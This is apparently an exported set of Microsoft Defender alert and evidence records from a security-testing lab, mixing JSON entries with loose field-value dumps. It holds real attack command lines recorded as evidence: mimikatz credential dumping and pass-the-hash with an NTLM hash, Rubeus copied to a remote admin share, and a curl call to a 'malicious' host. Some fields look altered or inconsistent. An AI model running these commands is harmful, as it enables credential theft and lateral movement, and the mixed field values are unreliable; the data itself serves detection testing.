[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:48:30.2433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T08:48:30.2433333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "PendingApproval", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T08:48:30.2433333Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "PendingApproval", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:48:30.2433333Z", "fileName": "lsass.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:22:31.0581711Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 568, "processCommandLine": "lsass.exe", "processCreationTime": "2022-12-22T08:22:31.2215121Z", "processId": 720, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c", "sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:48:30.2433333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 1896, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'", "processCreationTime": "2022-12-22T08:47:11.8139068Z", "processId": 6324, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "MSDXV8-Win10V$", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:49:39.75Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T08:49:39.75Z", "fileName": "Rubeus.exe", "filePath": "\\\\msdxv8-win10b\\C$\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-22T08:49:39.75Z", "fileName": null, "filePath": null, "ipAddress": "10.0.1.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:49:39.75Z", "fileName": "xcopy.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:29.1097133Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 6584, "processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv8-win10b\\C$\\Temp", "processCreationTime": "2022-12-22T08:47:29.597379Z", "processId": 4088, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "a2d8e1a994cb7d774da09896cbb275238268b085", "sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:26.1266667Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,780
curl http://malicious
2022-11-21T02:02:27.1310359Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:27:36.8066667Z
Suspicious
None
root
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
10,944
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-11-21T02:13:46.7172682Z
11,068
2022-11-21T02:01:28.4753286Z
null
null
null
null
da638037515168785563_1551389985
ee941733-97a7-477b-9e4e-0b4e04a8465d
686
MicrosoftDefenderForEndpoint
2022-11-11T08:18:36.8785763Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:09.0417181Z
2022-11-11T08:17:09.0417181Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:18:37.01Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:18:37.01Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-11T08:17:06.3382251Z", "processId": 6044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:47:35.73Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638071952904737348_-1257045812
f0b84ff9-f7d0-47cc-ba04-04d7fa9263d3
970
MicrosoftDefenderForEndpoint
2022-12-21T04:54:50.4737476Z
2022-12-21T04:58:53.4333333Z
null
2022-12-21T04:51:35.2938513Z
2022-12-21T04:51:35.2938513Z
Connection to a custom network indicator
An endpoint has connected to a URL or domain in your list of custom indicators.
CommandAndControl
New
Informational
null
UnsupportedAlertType
null
null
CustomerTI
08dfd06f-d2e2-4049-899f-67b406311d84
null
null
null
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV8" } ], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-21T04:54:50.71Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-12-21T04:54:50.71Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "cnn.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-12-21T04:54:50.71Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "http://cnn.com/", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "steve", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-21T04:54:50.71Z", "fileName": "chrome.exe", "filePath": "C:\\Program Files\\Google\\Chrome\\Application", "ipAddress": null, "parentProcessCreationTime": "2022-12-21T04:51:30.5564156Z", "parentProcessFileName": "chrome.exe", "parentProcessFilePath": "C:\\Program Files\\Google\\Chrome\\Application", "parentProcessId": 10208, "processCommandLine": "\"chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=1984,i,9501624012299549115,11600505733383203802,131072 /prefetch:8", "processCreationTime": "2022-12-21T04:51:32.1204974Z", "processId": 11548, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "0a43ff3773e7fcbb9a98029957c41bc3af56ae94", "sha256": "d2ae715f046aec3fccbfb4fe9624fa0c5b5cf45622ca2ace26de9f56552aebe2", "url": null, "userPrincipalName": "steve@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-16T08:31:10.4566667Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1109
34a6a005-fc93-42dc-ae87-352d3e9921c4
jesse@msdxv2.m365dpoc.com
34f6168251ce3ed625e9b8d26b0ce5dad7421dbe
20a100ad633bd79474edcc3736eefc395d39f7d5904c46ddb96593316ce6b262
SystemSettingsAdminFlows.exe
C:\Windows\System32
2,640
"SystemSettingsAdminFlows.exe" Defender RTP 1
2022-11-16T08:30:16.5964416Z
4,704
2022-11-16T07:26:02.7983467Z
SystemSettings.exe
C:\Windows\ImmersiveControlPanel
Detected
7114973b832b32d349815a5d2811738cc10fa650
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T13:47:46.4766667Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T14:15:50.0966667Z
Suspicious
None
darol
internal.corp
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:10:38.4Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
10,444
whoami /all
2022-11-18T05:09:25.7709122Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
aa33da8527-5552-4a5d-ab13-f47ee56ceb05
33da8527-5552-4a5d-ab13-f47ee56ceb05
686
MicrosoftDefenderForIdentity
2022-11-11T10:19:27.3677258Z
2022-11-12T01:40:19.41Z
2022-11-12T01:35:42.84Z
2022-11-11T08:13:53.070279Z
2022-11-11T08:17:32.793161Z
Suspected identity theft (pass-the-ticket)
An actor took Steve Lewis (IT director)'s Kerberos ticket from MSDXV2-Win10B and used it on MSDXV2-Win10V to access 3 resources.
LateralMovement
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
PassTheTicketSecurityAlert
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1550", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "malicious.io", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "malicious.io", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } }, { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "malicious.io", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": null, "accountName": "krbtgt", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-11T10:19:27.7333333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-502", "verdict": "5" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T10:19:27.7333333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-11T10:19:27.7333333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-20T12:55:53.1166667Z
Suspicious
None
operator
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:28:42.99Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:47.8633333Z
Suspicious
None
steve
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null